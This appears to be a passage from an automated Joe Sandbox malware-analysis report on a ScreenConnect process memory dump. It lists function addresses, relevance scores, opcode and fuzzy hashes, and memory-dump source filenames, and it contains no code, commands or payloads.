                                                                                                                                                                                                                                                          • Opcode ID: 14cf4fa8529d446c552384fda988bb2326c03bc2d245783951b8cf5ebe7e10ae
                                                                                                                                                                                                                                                          • Instruction ID: 2d681dcd1857ff52aa515d3a9a3101d96fc1c1b15a4d2ffa49f75785b365a7b0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14cf4fa8529d446c552384fda988bb2326c03bc2d245783951b8cf5ebe7e10ae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23C09B55F28D0D47F398E57D285567993C3F7D45C5B5446B5940DC31C2DD5878164201
                                                                                                                                                                                                                                                          Function 00007FF888262476 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7e8f0cc16b7497ab09924e62e294170842d0d5eda0c00d7baad7cef6b5b797e9
                                                                                                                                                                                                                                                          • Instruction ID: 6bd2fd1d35a7c8292ae80ae5a3f2bfb440ca2b07d392fec11e4062c8524d58b9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e8f0cc16b7497ab09924e62e294170842d0d5eda0c00d7baad7cef6b5b797e9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDC09210E4898B9BF294EB3784412BE21A37F88681F918435E01DCA1C6CE3CB502D245
                                                                                                                                                                                                                                                          Function 00007FF8882621B8 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2df3dc9958e00d79e7d5e58d8525c901af5b025bd746c7d3aae5bb2387151d90
                                                                                                                                                                                                                                                          • Instruction ID: 3ef6c88603d4ce7dec0b1a614e7b4aaa25253b975f4f94d7a6cc9ecad10e8ae4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2df3dc9958e00d79e7d5e58d8525c901af5b025bd746c7d3aae5bb2387151d90
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5A00200E4D95786A1A1E56740011BD10612F55A81E604236D01DD51C6CF2CB943929A

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          Function 00007FF88826A010 Relevance: 7.7, Strings: 6, Instructions: 209COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: B)$Jr$Jr$Jr$Jr$Jr
                                                                                                                                                                                                                                                          • API String ID: 0-757641468
                                                                                                                                                                                                                                                          • Opcode ID: dde8f36c6251b04f41ec756e24aebd61e352d1dc60f6c3b07b6c36d9583a193c
                                                                                                                                                                                                                                                          • Instruction ID: 232bca67d9d762cf5917d97299c015a84240412f97d7852c954f2f17fc66d95b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dde8f36c6251b04f41ec756e24aebd61e352d1dc60f6c3b07b6c36d9583a193c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C510866E1D9D35BE729E2781C172E96791FF51792F680278D098C35C2EF0C740A83D6
                                                                                                                                                                                                                                                          Function 00007FF88826EEB5 Relevance: 7.7, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: B)$Jr$Jr$Jr$Jr$Jr
                                                                                                                                                                                                                                                          • API String ID: 0-757641468
                                                                                                                                                                                                                                                          • Opcode ID: afb626bf06226e52e8d6b6f615395def8ae425455607bb8b3fb643b98ac721df
                                                                                                                                                                                                                                                          • Instruction ID: 469e447bfc18f8cb0d5a3e1bb8db6861ebac10edd6bb8676d79688451f3ffabe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb626bf06226e52e8d6b6f615395def8ae425455607bb8b3fb643b98ac721df
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A541D656E1D6C34BE729E2681C133E9ABD1BF51692F6802B9D06CC75C3EE0C740A8397